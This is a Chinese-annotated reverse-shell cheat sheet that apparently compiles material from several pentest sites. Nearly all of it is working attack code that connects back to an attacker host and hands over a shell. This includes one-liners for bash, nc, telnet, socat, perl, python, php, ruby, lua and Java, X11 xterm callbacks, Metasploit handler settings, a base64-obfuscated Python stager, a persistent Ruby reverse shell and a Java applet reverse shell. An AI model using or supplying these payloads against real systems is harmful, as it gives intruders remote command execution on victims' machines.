http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html

http://www.waitalone.cn/linux-shell-rebound-under-way.html

http://roo7break.co.uk/?p=215

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
http://www.91ri.org/9367.html
http://www.tuicool.com/articles/3uQ3ue

bash -i >& /dev/tcp/10.0.0.1/1234 0>&1

　不同版本的nc不一定支持-e选项
　nc -e cmd.exe 10.0.0.1 1234　　
　nc -e /bin/sh 10.0.0.1 1234

nc不使用-e
Hacker: nc -lvnp 1234

Victim: mknod /tmp/backpipe p

Victim: /bin/sh 0</tmp/backpipe | nc 10.0.0.1 1234 1>/tmp/backpipe

不使用nc

Method 1:

Hacker: nc -nvlpp 1234

Victim: /bin/bash -i > /dev/tcp/10.0.0.1/1234 0<&1 2>&1

Method 2:

Hacker: nc -nvlpp 1234

Victim: mknod backpipe p && telnet 10.0.0.1 1234 0backpipe

Method 3:

Hacker: nc -nvlpp 8080

Hacker: nc -nvlpp 8888

Victim: telnet 10.0.0.1 1234 | /bin/bash | telnet 10.0.0.1 1234

Method 4:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Method 5:
nc 10.0.0.1 1234|/bin/sh|nc x.x.x.x 2444

连接远程端口

nc localhost 80

socat - TCP:localhost:80

监听端口

nc -lp localhost 700

socat TCP-LISTEN:700 -

正向shell

nc -lp localhost 700 -e /bin/bash

socat TCP-LISTEN:700 EXEC:/bin/bash

SSL连接

SSL服务器: socat OPENSSL-LISTEN:443,cert=/cert.pem -

需要首先生成证书文件

SSL客户端: socat - OPENSSL:localhost:443

fork服务器

可以将一个使用标准输入输出的单进程程序变为一个使用fork方法的多进程服务

不同设备的通信

将U盘进行网络共享： socat -d -d /dev/ttyUSB1,raw,nonblock,ignoreeof,cr,echo=0 TCP4-LISTEN:5555,reuseaddr　　-d -d 指的是调试信息的级别

将终端转发到COM1： socat READLINE,history=$HOME/.cmd_history /dev/ttyS0,raw,echo=0,crnl

socat还有个readbyte的option，可以当dd用了。

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

不依赖bin/bash

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('10.0.0.1',1234))\nwhile 1:  proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"

#msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=192.168.90.1 LPORT=1234

import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))

base64解码后：

import socket,struct

s=socket.socket(2,1)

s.connect(('192.168.90.1',1234))

l=struct.unpack('>I',s.recv(4))[0]

d=s.recv(4096)

while len(d)!=l:

    d+=s.recv(4096)

exec(d,{'s':s})

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' #代码假设TCP连接的文件描述符为3，如果不行可以试下4,5,6

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

不依赖于/bin/sh： ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.0.0.1","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

目标是windows： ruby -rsocket -e 'c=TCPSocket.new(10.0.0.1","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'　

r = Runtime.getRuntime()

p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/1234;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])

p.waitFor()

msf：use payload/java/shell/reverse_tcp

rm -f /tmp/p; mknod /tmp/p p && telnet 10.0.0.1 1234 0/tmp/p

或者

mknod backpipe p && telnet 10.0.0.1 1234 0<backpipe | /bin/bash 1>backpipe

lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

msf反弹：use payload/cmd/unix/reverse_lua

首先开启Xserver：　　　　　　　　　　　　# TCP

Xnest :               　　　　　　　# Note: The command starts with uppercase X

授予目标机连回来的权限：

xterm -display 127.0.0.1:         # Run this OUTSIDE the Xnest, another tab

xhost +targetip                    # Run this INSIDE the spawned xterm on the open X Server

如果想让任何人都连上：

xhost +                     　　　　 # Run this INSIDE the spawned xterm on the open X Server

假设xterm已安装，连回你的Xserver：

xterm -display attackerip:1　或者：$ DISPLAY=attackerip: xterm

use exploit/multi/handler

set PAYLOAD php/meterpreter/reverse_tcp

set LHOST IP

set LPORT port

exploit -j

$ wget -O - -q "http://www.test.com/sh.php?cmd=ssh -i /tmp/id_rsa -o StrictHostKeyChecking=no -R 127.0.0.1:8080:192.168.20.13:8080 -N -f username@<attacker_ip>"

#!/usr/bin/env ruby

require 'socket'

require 'open3'

#Set the Remote Host IP

RHOST = "192.168.1.10"

#Set the Remote Host Port

PORT = "6667"

#Tries to connect every 20 sec until it connects.

begin

sock = TCPSocket.new "#{RHOST}", "#{PORT}"

sock.puts "We are connected!"

rescue

  sleep 20

  retry

end

#Runs the commands you type and sends you back the stdout and stderr.

begin

  while line = sock.gets

    Open3.popen2e("#{line}") do | stdin, stdout_and_stderr |

              IO.copy_stream(stdout_and_stderr, sock)

              end

  end

rescue

  retry

end

import java.io.*;

import java.net.Socket;

import java.util.*;

import java.util.regex.*;

import java.applet.Applet;

public class poc extends Applet{

    /**

     * Author: daniel baier alias duddits

     * Licens: GPL

     * Requirements: JRE 1.5 for running and the JDK 1.5 for compiling or higher

     * Version: 0.1 alpha release

     */

    public String cd(String start, File currentDir) {

        File fullPath = new File(currentDir.getAbsolutePath());

        String sparent = fullPath.getAbsoluteFile().toString();

        return sparent + "/" + start;

        }

    @SuppressWarnings("unchecked")

    public void init() {

        poc rs = new poc();

        PrintWriter out;

        try {

            Socket clientSocket = new Socket("192.168.5.222",10003);

            out = new PrintWriter(clientSocket.getOutputStream(), true);

            out.println("\tJRS 0.1 alpha release\n\tdeveloped by duddits alias daniel baier");

            boolean run = true;

            String s;

            BufferedReader br = new BufferedReader(new InputStreamReader(clientSocket.getInputStream()));

            String startort = "/";

            while (run) {

                String z1;

                File f = new File(startort);

                out.println(f.getAbsolutePath() + "> ");

                s = br.readLine();

                z1 = s;

                Pattern pcd = Pattern.compile("^cd\\s");

                Matcher mcd = pcd.matcher(z1);

                String[] teile1 = pcd.split(z1);

                if (s.equals("exit")) {

                    run = false;

                }else if (s.equals(null) || s.equals("cmd") || s.equals("")) {

                } else if(mcd.find()){

                    try {

                        String cds = rs.cd(teile1[1], new File(startort));

                        startort = cds;

                        } catch (Exception verz) {

                        out.println("Path " + teile1[1]

                        + " not found.");

                        }

                }else {

                    String z2;

                    z2 = s;

                    Pattern pstring = Pattern.compile("\\s");

                    String[] plist = pstring.split(z2);

                    try {

                        LinkedList slist = new LinkedList();

                        for (int i = 0; i < plist.length; i++) {

                            slist.add(plist[i]);

                        }

                        ProcessBuilder builder = new ProcessBuilder(slist);

                        builder.directory(new File(startort));

                        Process p = builder.start();

                        Scanner se = new Scanner(p.getInputStream());

                        if (!se.hasNext()) {

                            Scanner sa = new Scanner(p.getErrorStream());

                            while (sa.hasNext()) {

                                out.println(sa.nextLine());

                            }

                        }

                        while (se.hasNext()) {

                            out.println(se.nextLine());

                        }

                    } catch (Exception err) {

                        out.println(f.getAbsolutePath() + "> Command "

                                + s + " failed!");

                        out.println(f.getAbsolutePath() +"> Please try cmd /c "+ s+" or bash -c " +s+" if this command is an shell buildin.");

                    }

                }

            }

            if(!clientSocket.isConnected()){

                run = false;

                out.flush();

                out.close();

            }

        } catch (Exception io) {

            //System.err.println("Connection refused by peer");

        }

    }

}